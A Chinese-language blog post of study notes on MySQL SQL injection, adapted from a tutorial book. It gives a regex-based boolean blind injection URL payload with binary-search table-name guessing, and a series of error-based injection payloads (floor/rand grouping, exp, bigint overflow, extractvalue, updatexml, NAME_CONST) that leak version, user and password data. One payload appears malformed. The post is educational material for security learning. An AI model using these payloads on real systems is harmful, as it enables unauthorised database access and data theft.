sql

《sql注入天书》基础知识梳理

上古bug

Posted by ethan-zhou on September 4, 2019

P.S.本文整理自《sql注入天书》,部分内容摘抄自这本书,加以小修改,和一些注解,记录下自己在学习过程中遇到的坑。


数据库

关于系统数据库information_schema

所有数据库:select schema_name from information_schema.schemata; xxx数据库里的所有数据表:select table_name from information_schema.tables where table_schema="xxx"; xxx表里面所有列:select column_name from information_schema.columns where table_name="xxx";

语法

几种注释

  1. #bla...
  2. bla--+blabla... 这里--的作用与#基本相同,不同的是--后面必须有一个空格,众所周知,在url编码里,空格常被+代替为了避免空格被地址栏忽略,可能就是我们把空格打成+(我猜的)。
  3. /*bla...*/

整型列的查询不需要闭合单引号

sql查询时如果要判断某个整数列比如id为某个数时,引号不需要闭合,select *** from *** where id=1select *** from *** where id="1"select *** from *** where id="1'"所得到的结果是一样的!

函数

系统函数

几个常用函数:

  1. version()——MySQL 版本
  2. user()——数据库用户名
  3. database()——数据库名
  4. @@datadir——数据库路径
  5. @@version_compile_os——操作系统版本

字符串

连接

  1. concat(str1,str2,...)——没有分隔符地连接字符串
  2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
  3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据说着比较抽象,其实也并不需要详细了解,知道这三个函数能一次性查出所有信息就行了。

截断

以下所有字符参数可以为sql查询语句

  1. left(a,b)从左侧截取 a 的前 b 位
  2. mid(a,b,c) 或者 substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。
  3. ascii() 或者 ord() 将字符转换为ascii码。

检查是否匹配正则表达式

字符串 regexp '正则表达式'

sql注入

基于正则的布尔盲注

如何返回正则匹配结果

判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

?id=1 and 1=(select 1 from information_schema.tables where table_schema="blind_sqli" and table_name regexp '^[a-z]' limit 0,1)--+

如果存在table_name符合要求那么limit 0,1就会将结果变成符合要求的第一个表,经过select 1这一列,会返回1进而与左边相等。 而如果没有符合要求的表名,那么右边就会是empty set了,与左边不想等。 同时,由于每个数据库会有多个表,如apps与access就都以a开头,那么我怎么知道以a开头的有几个呢?只需调整为limit 1,1看看能否成功选取匹配的第二张表名即可。

猜表名的过程——二分

以下是猜表名第一位的过程中,前文sql语句中正则表达式的变化及查询的返回结果。

^[a-z]->true	#说明是字母
^[a-m]->false	#说明在n-z里
^[n-t]->false	#说明在u-z里
^[u-w]->true	#说明在u-w里
^[u-v]->false	#说明是w

接下来按类似方法尝试
^w[a-z]
...以此类推

基于报错的 SQL 盲注

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

注释: 这里的concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a意思其实是跟concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) as a一样的! 这种注入方法原理:https://blog.csdn.net/qq_35544379/article/details/77453019

//explain:此处有三个点,一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的重复,三是 group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释为 mysql 的 bug 的问题。但是此处需要将 rand(0),rand()需要多试几次才行。 以上语句可以简化成如下的形式。

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式

select count(*) from select !1) group by (select 1 union select null union concat(version(),floor(rand(0)*2))

如果 rand 被禁用了可以使用用户变量来报错

select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

select exp(~(select * FROM(SELECT USER())a))

//double 数值类型超出范围 //Exp()为以 e 为底的对数函数;版本在 5.5.5 及其以上 可以参考 exp 报错文章:http://www.cnblogs.com/lcamry/articles/5509124.html

select !(select * from (select user())x) -(ps:这是减号) ~0

//bigint 超出范围;~0 是对 0 逐位取反,很大的版本在 5.5.5 及其以上 20Mysql 注入—sqlilabs—lcamry 可以参考文章 bigint 溢出文章 http://www.cnblogs.com/lcamry/articles/5509112.html

select extractvalue(1,concat(0x7e,(select @@version),0x7e));

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误

select updatexml(1,concat(0x7e,(select @@version),0x7e),1);

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

作者:@ethan-enhe
本文为作者原创,转载请注明出处:本文链接